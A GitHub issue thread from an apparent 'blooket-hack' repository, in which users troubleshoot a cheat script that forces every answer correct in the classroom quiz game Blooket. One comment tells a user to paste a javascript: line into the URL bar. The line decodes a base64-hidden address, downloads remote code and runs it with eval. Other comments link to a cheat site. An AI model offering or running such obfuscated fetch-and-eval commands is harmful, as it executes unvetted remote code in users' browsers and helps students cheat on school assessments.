### ISSUE TITLE
The getEveryAnswerCorrect.js didn't work

### ISSUE THREAD

**Issue by Cookie-Carky** [glixzzy/blooket-hack#455]
I try the getEveryAnswerCorrect but it still say wrong

**Comment by GlizxyBoi** [comment]
give more details

**Comment by CasperThouGhost** [comment]
> I try the getEveryAnswerCorrect but it still say wrong

@Cookie-Carky try pasting javascript:fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbEV2ZXJ5QW5zd2VyQ29ycmVjdC5qcw==')).then((res) => res.text().then((t) => eval(t)))
into the url bar, it should be working I just tried it.

**Comment by GlizxyBoi** [comment]
ik i have done it

**Comment by Greenlio** [comment]
https://user-images.githubusercontent.com/62725108/143143329-1dab17bf-e0dc-4841-9216-98c8eee50f8b.mp4

**Comment by Greenlio** [comment]
oops

wrong video

**Comment by Greenlio** [comment]
https://user-images.githubusercontent.com/62725108/143143361-d2aa2f6d-b533-4405-8988-09b7afe947d5.mp4

**Comment by ilikecatss** [comment]
getEveryAnswerCorrect.js doesn't work on battle royale or classic

**Comment by Greenlio** [comment]
> getEveryAnswerCorrect.js doesn't work on battle royale or classic

well yea, we have no cheats for battle royale or classic.

**Comment by varedz** [comment]
Method was patched, use new method.
https://schoolcheats.net/blooket/
https://www.youtube.com/watch?v=uuCwUL-dEDk
